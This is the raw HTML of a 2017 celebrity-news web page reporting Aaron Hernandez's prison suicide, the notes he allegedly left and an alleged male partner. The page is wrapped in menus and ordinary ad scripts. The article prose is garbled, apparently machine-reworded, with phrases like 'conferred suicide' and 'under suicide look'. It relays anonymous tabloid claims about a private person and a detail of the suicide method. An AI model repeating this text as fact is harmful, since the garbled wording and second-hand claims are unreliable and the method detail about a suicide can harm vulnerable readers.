                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="#" title="Vimeo">
                <i class="td-icon-font td-icon-vimeo"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="#" title="VKontakte">
                <i class="td-icon-font td-icon-vk"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra466@gmail.com" title="Windows">
                <i class="td-icon-font td-icon-windows"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://en.gravatar.com/pervaiz1222" title="WordPress">
                <i class="td-icon-font td-icon-wordpress"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra@yahoo.com" title="Yahoo">
                <i class="td-icon-font td-icon-yahoo"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.youtube.com/channel/UCp7yffgMZiur1QK8yKUxqhA" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-trending-menu-final-container"><ul id="menu-trending-menu-final" class="td-mobile-main-menu"><li id="menu-item-139738" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first menu-item-139738"><a href="http://www.thenewstrack.com/">HOME</a></li>
<li id="menu-item-139383" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-139383"><a href="http://www.thenewstrack.com/category/international-news/">International</a></li>
<li id="menu-item-106454" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106454"><a href="http://www.thenewstrack.com/category/pakistan-news/">Pakistan News</a></li>
<li id="menu-item-106450" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106450"><a href="http://www.thenewstrack.com/category/showbiz-news/">Showbiz</a></li>
<li id="menu-item-106453" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106453"><a href="http://www.thenewstrack.com/category/entertainment/">Entertainment</a></li>
<li id="menu-item-106451" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106451"><a href="http://www.thenewstrack.com/category/fashion-lifestyle/">Fashion &#038; LifeStyle</a></li>
<li id="menu-item-106452" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106452"><a href="http://www.thenewstrack.com/category/top-10/">TOP 10</a></li>
<li id="menu-item-110088" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-110088"><a href="http://www.thenewstrack.com/category/sports/">Sports News</a></li>
<li id="menu-item-110089" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-110089"><a href="http://www.thenewstrack.com/category/car-news/">Technology</a></li>
<li id="menu-item-110090" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-110090"><a href="http://www.thenewstrack.com/category/top-5/">Top 5</a></li>
<li id="menu-item-145691" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-145691"><a href="http://www.thenewstrack.com/contact/">Contact</a></li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
    </div>    <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
		<form method="get" class="td-search-form" action="http://www.thenewstrack.com/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Search</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob"></div>
	</div>
</div>    
    
    <div id="td-outer-wrap">
    
        <!--
Header style 1
-->

<div class="td-header-wrap td-header-style-1">

    <div class="td-header-top-menu-full">
        <div class="td-container td-header-row td-header-top-menu">
            
    <div class="top-bar-style-1">
        
<div class="td-header-sp-top-menu">


	<!-- td weather source: cache -->		<div class="td-weather-top-widget" id="td_top_weather_uid">
			<i class="td-icons shower-rain-d"></i>
			<div class="td-weather-now" data-block-uid="td_top_weather_uid">
				<span class="td-big-degrees">11.6</span>
				<span class="td-weather-unit">C</span>
			</div>
			<div class="td-weather-header">
				<div class="td-weather-city">New York</div>
			</div>
		</div>
		        <div class="td_data_time">
            <div >

                Saturday, April 22, 2017
            </div>
        </div>
    </div>
        <div class="td-header-sp-top-widget">
    
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://thenewstrackofficial1.blogspot.com/" title="Blogger">
                <i class="td-icon-font td-icon-blogger"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://digg.com/u/thenewstrack" title="Digg">
                <i class="td-icon-font td-icon-digg"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/thenewstrack" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.flickr.com/people/thenewstrackcom/" title="Flickr">
                <i class="td-icon-font td-icon-flickr"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://plus.google.com/+thenewstrack" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/thenewstrack/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://pk.linkedin.com/in/sheikh-pervaiz-vohra-4b1a8438" title="Linkedin">
                <i class="td-icon-font td-icon-linkedin"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="mailto:pervaizvohra466@gmail.com" title="Mail">
                <i class="td-icon-font td-icon-mail-1"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://myspace.com/thenewstrack" title="Myspace">
                <i class="td-icon-font td-icon-myspace"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="webstrackinc@gmail.com" title="Paypal">
                <i class="td-icon-font td-icon-paypal"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.pinterest.com/thenewstrack/" title="Pinterest">
                <i class="td-icon-font td-icon-pinterest"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra" title="Reddit">
                <i class="td-icon-font td-icon-reddit"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra466@gmail.com" title="RSS">
                <i class="td-icon-font td-icon-rss"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra" title="Skype">
                <i class="td-icon-font td-icon-skype"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://soundcloud.com/sheikh-pervaiz-vohra" title="Soundcloud">
                <i class="td-icon-font td-icon-soundcloud"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.stumbleupon.com/submit" title="StumbleUpon">
                <i class="td-icon-font td-icon-stumbleupon"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.tumblr.com/login?redirect_to=%2Fblog%2Fthenewstrackofficial" title="Tumblr">
                <i class="td-icon-font td-icon-tumblr"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/thenewstrack" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="#" title="Vimeo">
                <i class="td-icon-font td-icon-vimeo"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="#" title="VKontakte">
                <i class="td-icon-font td-icon-vk"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra466@gmail.com" title="Windows">
                <i class="td-icon-font td-icon-windows"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://en.gravatar.com/pervaiz1222" title="WordPress">
                <i class="td-icon-font td-icon-wordpress"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra@yahoo.com" title="Yahoo">
                <i class="td-icon-font td-icon-yahoo"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.youtube.com/channel/UCp7yffgMZiur1QK8yKUxqhA" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span></div>
    </div>

<!-- LOGIN MODAL -->

                <div  id="login-form" class="white-popup-block mfp-hide mfp-with-anim">
                    <ul class="td-login-tabs">
                        <li><a id="login-link" class="td_login_tab_focus">LOG IN</a></li>
                    </ul>



                    <div class="td-login-wrap">
                        <div class="td_display_err"></div>

                        <div id="td-login-div" class="">
                            <div class="td-login-panel-title">Welcome! Log into your account</div>
                            <input class="td-login-input" type="text" name="login_email" id="login_email" placeholder="your username" value="" required>
                            <input class="td-login-input" type="password" name="login_pass" id="login_pass" value="" placeholder="your password" required>
                            <input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Log In">


                            <div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password?</a></div>


                        </div>

                        

                         <div id="td-forgot-pass-div" class="td-display-none">
                            <div class="td-login-panel-title">Recover your password</div>
                            <input class="td-login-input" type="text" name="forgot_email" id="forgot_email" placeholder="your email" value="" required>
                            <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Pass">
                        </div>




                    </div>
                </div>
                        </div>
    </div>

    <div class="td-banner-wrap-full td-logo-wrap-full">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                        <a class="td-main-logo" href="http://www.thenewstrack.com/">
            <img class="td-retina-data" data-retina="http://www.thenewstrack.com/wp-content/uploads/2016/10/newtrack-large2ff.png" src="http://www.thenewstrack.com/wp-content/uploads/2016/10/newtrack-large2ff.png" alt="Latest United State News,Latest Entrtainment News,Latest US News,International Live News,General Knowledge, Top 10 Lists" title="Latest United State News,Latest Entrtainment News,Latest US News,International Live News,General Knowledge, Top 10 Lists"/>
            <span class="td-visual-hidden">The News Track</span>
        </a>
                </div>
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-header ">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="7610233624"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="7610233624"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="7610233624"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="7610233624"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 


</div>            </div>
        </div>
    </div>

    <div class="td-header-menu-wrap-full">
        <div class="td-header-menu-wrap td-header-gradient">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
        		<a class="td-mobile-logo td-sticky-header" href="http://www.thenewstrack.com/">
			<img class="td-retina-data" data-retina="http://www.thenewstrack.com/wp-content/uploads/2016/10/thenewstrack-White-For-Mobile.png" src="http://www.thenewstrack.com/wp-content/uploads/2016/10/thenewstrack-White-For-Mobile.png" alt="Latest United State News,Latest Entrtainment News,Latest US News,International Live News,General Knowledge, Top 10 Lists" title="Latest United State News,Latest Entrtainment News,Latest US News,International Live News,General Knowledge, Top 10 Lists"/>
		</a>
			<a class="td-header-logo td-sticky-header" href="http://www.thenewstrack.com/">
			<img class="td-retina-data" data-retina="http://www.thenewstrack.com/wp-content/uploads/2016/10/newtrack-large2ff.png" src="http://www.thenewstrack.com/wp-content/uploads/2016/10/newtrack-large2ff.png" alt="Latest United State News,Latest Entrtainment News,Latest US News,International Live News,General Knowledge, Top 10 Lists" title="Latest United State News,Latest Entrtainment News,Latest US News,International Live News,General Knowledge, Top 10 Lists"/>
		</a>
	    </div>
    <div class="menu-trending-menu-final-container"><ul id="menu-trending-menu-final-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-139738"><a href="http://www.thenewstrack.com/">HOME</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-139383"><a href="http://www.thenewstrack.com/category/international-news/">International</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106454"><a href="http://www.thenewstrack.com/category/pakistan-news/">Pakistan News</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106450"><a href="http://www.thenewstrack.com/category/showbiz-news/">Showbiz</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106453"><a href="http://www.thenewstrack.com/category/entertainment/">Entertainment</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106451"><a href="http://www.thenewstrack.com/category/fashion-lifestyle/">Fashion &#038; LifeStyle</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106452"><a href="http://www.thenewstrack.com/category/top-10/">TOP 10</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-110088"><a href="http://www.thenewstrack.com/category/sports/">Sports News</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-110089"><a href="http://www.thenewstrack.com/category/car-news/">Technology</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-110090"><a href="http://www.thenewstrack.com/category/top-5/">Top 5</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-145691"><a href="http://www.thenewstrack.com/contact/">Contact</a></li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
                <a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form method="get" class="td-search-form" action="http://www.thenewstrack.com/">
				<div role="search" class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-147097" class="post-147097 post type-post status-publish format-gallery has-post-thumbnail hentry category-celebrities tag-aaron-hernandez tag-aaron-hernandez-dead tag-celebrity-news post_format-post-format-gallery" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  style="background-color:#f7c438; color:rgba(0, 0, 0, 0.9); border-color:#f7c438;" href="http://www.thenewstrack.com/category/celebrities/">Celebrities</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report</h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name">By <a href="http://www.thenewstrack.com/author/adela-brant/">Adela Brant</a> - </div>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-22T10:33:19+00:00" >April 22, 2017</time></span>                    <div class="td-post-comments"><a href="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/#respond"><i class="td-icon-comments"></i>0</a></div>                    <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-147097">100</span></div>                </div>

            </header>

        </div>

        <div class="td-post-sharing td-post-sharing-top td-with-like">
				<div class="td-default-sharing">
		            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Share on Facebook</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&via=%40thenewstrack"  ><i class="td-icon-twitter"></i><div class="td-social-but-text">Tweet on Twitter</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;media=http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png&description=Aaron Hernandez supposedly composed three notes before he conferred suicide in his jail cell. Presently, a stunning new report asserts that one was routed" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
		            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report%20-%20http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" ><i class="td-icon-whatsapp"></i></a>
	            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" data-text="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>

        <div class="td-post-content">

        <div class="td-post-featured-image"><a href="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png" data-caption=""><img width="528" height="585" class="entry-thumb td-modal-image" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png" alt="Aaron Hernandez" title="Aaron Hernandez"/></a></div>
        
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_top ">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 


<!-- Quick Adsense WordPress Plugin: http://quicksense.net/ -->
<div style="float:none;margin:10px 0 10px 0;text-align:center;">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- newstrack_ros_1_336x280 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-5686136442868151"
     data-ad-slot="4656767225"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- thenewstrack link ads468*15 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:468px;height:15px"
     data-ad-client="ca-pub-5686136442868151"
     data-ad-slot="4550896026"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script type="text/javascript" src="https://www.connectignite.com/srv/inimage/15423/add.js" id="cibn-ads"></script>
</div>
<p>Aaron Hernandez supposedly composed three notes before he conferred suicide in his jail cell. Presently, a stunning new report asserts that one was routed to his gay sweetheart who is said to be under suicide look as more subtle elements of Aaron&#8217;s demise are uncovered.<br />
<iframe src="https://www.youtube.com/embed/CxE1CivaIOE" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe><br />
Aaron Hernandez supposedly composed three suicide letters that were found in his correctional facility cell after he hanged himself on Apr. 19. The notes were purportedly found the day after he killed himself at 27 years old at the Souza Baranowski Correctional Center. He was serving a lifelong incarceration without the likelihood of parole for the murder of Odin Lloyd, his life partner&#8217;s sister&#8217;s sweetheart. Another report asserted that the letters were routed to Aaron&#8217;s life partner Shayanna Jenkins-Hernandez, his four-year old little girl Avielle, and his &#8220;gay jailhouse significant other,&#8221; as per a source from The Daily Mail. Past reports said that one letter was routed to general society and the others were for particular individuals.</p>
<!-- Quick Adsense WordPress Plugin: http://quicksense.net/ -->
<div style="float:none;margin:10px 0 10px 0;text-align:center;">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- newstrack_ros_1_336x280 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-5686136442868151"
     data-ad-slot="4656767225"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- thenewstrack link ads468*15 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:468px;height:15px"
     data-ad-client="ca-pub-5686136442868151"
     data-ad-slot="4550896026"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>

<p><img class="aligncenter wp-image-147099 size-full" title="Aaron Hernandez" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez1.png" alt="Aaron Hernandez" width="850" height="571" srcset="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez1.png 850w, http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez1-300x202.png 300w, http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez1-768x516.png 768w, http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez1-696x468.png 696w, http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez1-625x420.png 625w" sizes="(max-width: 850px) 100vw, 850px" />

<!-- Quick Adsense WordPress Plugin: http://quicksense.net/ -->
<div style="float:none;margin:10px 0 10px 0;text-align:center;">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- newstrack_ros_1_336x280 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-5686136442868151"
     data-ad-slot="4656767225"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<div id="contentad318624"></div>
<script type="text/javascript">
    (function(d) {
        var params =
        {
            id: "474d20e4-7d36-476b-aa33-cff033dbf51d",
            d:  "dGhlbmV3c3RyYWNrLmNvbQ==",
            wid: "318624",
            cb: (new Date()).getTime()
        };

        var qs=[];
        for(var key in params) qs.push(key+'='+encodeURIComponent(params[key]));
        var s = d.createElement('script');s.type='text/javascript';s.async=true;
        var p = 'https:' == document.location.protocol ? 'https' : 'http';
        s.src = p + "://api.content-ad.net/Scripts/widget2.aspx?" + qs.join('&');
        d.getElementById("contentad318624").appendChild(s);
    })(document);
</script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- thenewstrack link ads468*15 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:468px;height:15px"
     data-ad-client="ca-pub-5686136442868151"
     data-ad-slot="4550896026"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>

They additionally report the man supposedly said to be Aaron&#8217;s beau, who was not distinguished, has been on &#8220;eyeball to eyeball&#8221; suicide watch since Aaron&#8217;s passing. The source near the examination told the news outlet the man was &#8220;accepted to be the last individual Hernandez addressed&#8221; before he conferred suicide. Another insider said Aaron apparently arranged his passing for quite a long time and had given away the greater part of his ownership to other jail prisoners. Reports said he supposedly rubbed cleanser on the floor of his cell so &#8220;he would not have the capacity to spare himself&#8221; when he conferred suicide.</p>
<!-- Quick Adsense WordPress Plugin: http://quicksense.net/ -->
<div style="float:none;margin:10px 0 10px 0;text-align:center;">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- thenewstrack link ads468*15 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:468px;height:15px"
     data-ad-client="ca-pub-5686136442868151"
     data-ad-slot="4550896026"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- thenewstrack link ads468*15 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:468px;height:15px"
     data-ad-client="ca-pub-5686136442868151"
     data-ad-slot="4550896026"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>

<!-- Quick Adsense WordPress Plugin: http://quicksense.net/ -->
<div style="float:none;margin:10px 0 10px 0;text-align:center;">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- newstrack_ros_1_336x280 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-5686136442868151"
     data-ad-slot="4656767225"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<div id="contentad313785"></div>
<script type="text/javascript">
    (function(d) {
        var params =
        {
            id: "02c41f57-3425-416b-81ba-03477f184962",
            d:  "dGhlbmV3c3RyYWNrLmNvbQ==",
            wid: "313785",
            exitPop: true,
            cb: (new Date()).getTime()
        };

        var qs=[];
        for(var key in params) qs.push(key+'='+encodeURIComponent(params[key]));
        var s = d.createElement('script');s.type='text/javascript';s.async=true;
        var p = 'https:' == document.location.protocol ? 'https' : 'http';
        s.src = p + "://api.content-ad.net/Scripts/widget2.aspx?" + qs.join('&');
        d.getElementById("contentad313785").appendChild(s);
    })(document);
</script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- thenewstrack link ads468*15 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:468px;height:15px"
     data-ad-client="ca-pub-5686136442868151"
     data-ad-slot="4550896026"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>

